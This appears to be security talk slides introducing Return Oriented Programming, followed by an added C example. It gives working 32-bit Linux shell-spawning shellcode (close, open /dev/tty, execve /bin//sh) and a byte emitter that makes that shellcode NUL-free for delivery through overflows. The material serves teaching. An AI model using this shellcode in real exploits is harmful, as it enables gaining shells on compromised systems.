Return Oriented Programming (ROP) is an exploitation technique that many people have heard of but few know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.
TurtleSec
@pati_gallardo
Shellcode
A piece of code, typically machine code, that is delivered and executed as part of an exploit.
It is called "shellcode" because a traditional use was to start a shell, for example sh.
In real exploits it delivers some mechanism for further (remote) compromise of the system.
Shellcode - code that gives you a shell
int execve(const char *filename, char *const argv[], char *const envp[]);
[Diagram: a target process running the vulnerable program; the shellcode turns it into the same target process running /bin/sh]
open(2) through int 0x80 (32-bit Linux)

Register   Role             open
eax        syscall number   0x05
ebx        1st argument     const char *filename
ecx        2nd argument     int flags
edx        3rd argument     umode_t mode
open asm
"xor eax, eax\n\t"         // Zero out
"mov eax, 0x05\n\t"        // Set eax to the syscall number of open (0x05)
"xor ebx, ebx\n\t"         // Zero out
"push ebx\n\t"             // Push the NUL terminator
"mov ebx, 0x7974742f\n\t"  // "/tty" as a little-endian dword (digits read "ytt/")
"push ebx\n\t"             // Second half of the string
"mov ebx, 0x7665642f\n\t"  // "/dev" as a little-endian dword (digits read "ved/")
"push ebx\n\t"             // First half of the string; esp now points at "/dev/tty"
"mov ebx, esp\n\t"         // ebx = pointer to the filename
"xor ecx, ecx\n\t"         // flags = 0 (O_RDONLY)
"xor edx, edx\n\t"         // mode = 0
"int 0x80\n\t"             // Invoke the syscall
shellcode_asm.c (close, open, execve)

// Build as a 32-bit binary, since the int 0x80 numbers are the i386 ones: gcc -m32 shellcode_asm.c
int main(void) {
    __asm__(
        ".intel_syntax noprefix\n\t"
        // close(0): free stdin
        "xor eax, eax\n\t"         // Zero out
        "mov eax, 0x06\n\t"        // Set eax to the syscall number of close (0x06)
        "xor ebx, ebx\n\t"         // ebx = file descriptor 0
        "int 0x80\n\t"             // Invoke the syscall
        // open("/dev/tty", 0, 0): open returns the lowest free descriptor, so the tty becomes fd 0
        "xor eax, eax\n\t"         // Zero out
        "mov eax, 0x05\n\t"        // Set eax to the syscall number of open (0x05)
        "xor ebx, ebx\n\t"         // Zero out
        "push ebx\n\t"             // Push the NUL terminator
        "mov ebx, 0x7974742f\n\t"  // "/tty" as a little-endian dword (digits read "ytt/")
        "push ebx\n\t"             // Second half of the string
        "mov ebx, 0x7665642f\n\t"  // "/dev" as a little-endian dword (digits read "ved/")
        "push ebx\n\t"             // First half of the string; esp now points at "/dev/tty"
        "mov ebx, esp\n\t"         // ebx = pointer to the filename
        "xor ecx, ecx\n\t"         // flags = 0 (O_RDONLY)
        "xor edx, edx\n\t"         // mode = 0
        "int 0x80\n\t"             // Invoke the syscall
        // execve("/bin//sh", NULL, NULL): the doubled slash pads the path to 8 bytes
        "xor eax, eax\n\t"         // Zero out
        "mov eax, 0x0b\n\t"        // Set eax to the syscall number of execve (0x0b)
        "xor ebx, ebx\n\t"         // Zero out
        "push ebx\n\t"             // Push the NUL terminator
        "mov ebx, 0x68732f2f\n\t"  // "//sh" as a little-endian dword (digits read "hs//")
        "push ebx\n\t"             // Second half of the string
        "mov ebx, 0x6e69622f\n\t"  // "/bin" as a little-endian dword (digits read "nib/")
        "push ebx\n\t"             // First half of the string; esp now points at "/bin//sh"
        "mov ebx, esp\n\t"         // ebx = pointer to the filename
        "xor ecx, ecx\n\t"         // argv = NULL
        "xor edx, edx\n\t"         // envp = NULL
        "int 0x80\n\t"             // Invoke the syscall; on success execve never returns
        ".att_syntax prefix\n\t"   // Switch the assembler back so the compiler's own epilogue still assembles
    );
}
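The open(2) register table and the three-syscall program above both boil down to a short byte string that an exploit has to deliver. The following is an added example, not code from the talk or from shellcode_asm.c: a small C emitter that hand-assembles close(0), open("/dev/tty", 0, 0) and execve("/bin/sh", NULL, NULL) into raw x86 (32-bit Linux, int 0x80) bytes and counts the NUL bytes in the result. The practitioner point it makes is that "mov eax, 0x05" assembles to b8 05 00 00 00, and a payload delivered through a strcpy()- or gets()-style bug is cut off at the first NUL, whereas "xor eax, eax; mov al, 0x05" (31 c0 b0 05) sets the same register without any. Assumptions: strings are pushed with "push imm32" (opcode 0x68) rather than the slides' "mov ebx, imm32; push ebx" (the stack contents are identical), /bin/sh is padded to "//bin/sh" instead of the slides' "/bin//sh", and the helper names build_shellcode, pad_path and count_nul are my own. Nothing here executes the bytes.

```c
/* Added example, not the talk's shellcode_asm.c: hand-assemble the slides'
 * close / open("/dev/tty") / execve("/bin/sh") sequence for 32-bit Linux
 * (int 0x80) and count NUL bytes.  Strings use `push imm32` instead of
 * `mov ebx, imm32; push ebx`; the resulting stack is the same.  The bytes
 * are only built and printed, never executed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SYS_OPEN   0x05
#define SYS_CLOSE  0x06
#define SYS_EXECVE 0x0b

typedef struct { uint8_t buf[128]; size_t len; } code_t;

static void emit(code_t *c, const uint8_t *b, size_t n) {
    memcpy(c->buf + c->len, b, n);
    c->len += n;
}

/* eax = nr.  nul_free=0 is the slides' `mov eax, imm32` (b8 nr 00 00 00);
 * nul_free=1 is `mov al, imm8` (b0 nr), which keeps the code NUL-free. */
static void emit_set_eax(code_t *c, uint8_t nr, int nul_free) {
    emit(c, (const uint8_t[]){0x31, 0xc0}, 2);                       /* xor eax, eax */
    if (nul_free) emit(c, (const uint8_t[]){0xb0, nr}, 2);            /* mov al, nr */
    else          emit(c, (const uint8_t[]){0xb8, nr, 0, 0, 0}, 5);   /* mov eax, nr */
}

/* Prepend '/' until strlen is a multiple of 4 (hypothetical helper).  Only
 * valid for absolute paths, where extra slashes are harmless: "/bin/sh"
 * becomes "//bin/sh", the same trick as the slides' "/bin//sh". */
int pad_path(const char *path, char *out, size_t outsz) {
    size_t n = strlen(path), pad = (4 - n % 4) % 4;
    if (n == 0 || path[0] != '/' || n + pad + 1 > outsz) return -1;
    memset(out, '/', pad);
    strcpy(out + pad, path);
    return 0;
}

/* Push `s` and a terminator, then ebx = esp.  The terminator comes from a
 * zeroed register because `push 0` would encode as 68 00 00 00 00.  Chunks
 * are pushed last-to-first so the string reads forward in memory. */
static int emit_push_string(code_t *c, const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n % 4 != 0) return -1;
    emit(c, (const uint8_t[]){0x31, 0xdb, 0x53}, 3);                 /* xor ebx, ebx ; push ebx */
    for (size_t i = n; i > 0; i -= 4) {
        uint8_t ins[5] = {0x68};                                     /* push imm32 */
        memcpy(ins + 1, s + i - 4, 4);
        emit(c, ins, 5);
    }
    emit(c, (const uint8_t[]){0x89, 0xe3}, 2);                       /* mov ebx, esp */
    return 0;
}

static void emit_zero_args_and_syscall(code_t *c) {
    emit(c, (const uint8_t[]){0x31, 0xc9, 0x31, 0xd2, 0xcd, 0x80}, 6); /* xor ecx,ecx ; xor edx,edx ; int 0x80 */
}

/* Returns the byte count, or -1 for a path that cannot be padded. */
int build_shellcode(code_t *c, const char *tty, const char *shell, int nul_free) {
    char p[64];
    c->len = 0;
    emit_set_eax(c, SYS_CLOSE, nul_free);                            /* close(0) */
    emit(c, (const uint8_t[]){0x31, 0xdb, 0xcd, 0x80}, 4);           /* xor ebx, ebx ; int 0x80 */
    emit_set_eax(c, SYS_OPEN, nul_free);                             /* open(tty, 0, 0) -> fd 0 */
    if (pad_path(tty, p, sizeof p) < 0 || emit_push_string(c, p) < 0) return -1;
    emit_zero_args_and_syscall(c);
    emit_set_eax(c, SYS_EXECVE, nul_free);                           /* execve(shell, NULL, NULL) */
    if (pad_path(shell, p, sizeof p) < 0 || emit_push_string(c, p) < 0) return -1;
    emit_zero_args_and_syscall(c);
    return (int)c->len;
}

/* A strcpy()/gets()-style overflow stops copying at the first NUL, so any
 * NUL in the payload truncates it; the `mov al` variant avoids them. */
size_t count_nul(const uint8_t *b, size_t n) {
    size_t k = 0;
    for (size_t i = 0; i < n; i++) k += (b[i] == 0);
    return k;
}

int main(void) {
    code_t c;
    for (int v = 0; v < 2; v++) {
        int n = build_shellcode(&c, "/dev/tty", "/bin/sh", v);
        printf("%-7s %2d bytes, %zu NUL:", v ? "mov al" : "mov eax", n, count_nul(c.buf, (size_t)n));
        for (int i = 0; i < n; i++) printf(" %02x", c.buf[i]);
        putchar('\n');
    }
    return 0;
}
```

The program compiles and runs on any host, since it only builds the bytes; the "mov eax" variant comes out at 67 bytes with 9 NULs (three per syscall number), the "mov al" variant at 58 bytes with none. To actually run the bytes you would need a 32-bit process and an executable mapping, which is exactly what the talk's point about non-executable stacks is about.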